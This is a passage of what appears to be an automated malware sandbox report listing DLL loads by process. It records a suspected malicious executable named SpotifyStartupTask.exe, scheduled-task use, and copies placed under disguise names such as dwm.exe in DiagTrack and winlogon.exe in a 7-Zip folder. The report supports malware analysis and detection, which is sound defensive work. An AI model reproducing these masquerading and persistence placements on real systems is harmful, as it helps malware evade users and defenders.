                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeSection loaded: sspicli.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: mscoree.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: apphelp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: version.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: wldp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: profapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: sspicli.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: mscoree.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: version.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: wldp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: profapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: sspicli.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ktmw32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: amsi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: userenv.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: winnsi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: rasapi32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: rasman.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: rtutils.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: mswsock.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: winhttp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: winmm.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: winmmbase.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: mmdevapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: devobj.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ksuser.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: avrt.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: audioses.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: powrprof.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: umpdc.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: msacm32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: midimap.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: edputil.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: dwrite.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: windowscodecs.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: dpapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: secur32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: schannel.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: msasn1.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeSection loaded: gpapi.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: mscoree.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: apphelp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: version.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: wldp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: profapi.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: sspicli.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: mscoree.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: version.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: wldp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: profapi.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
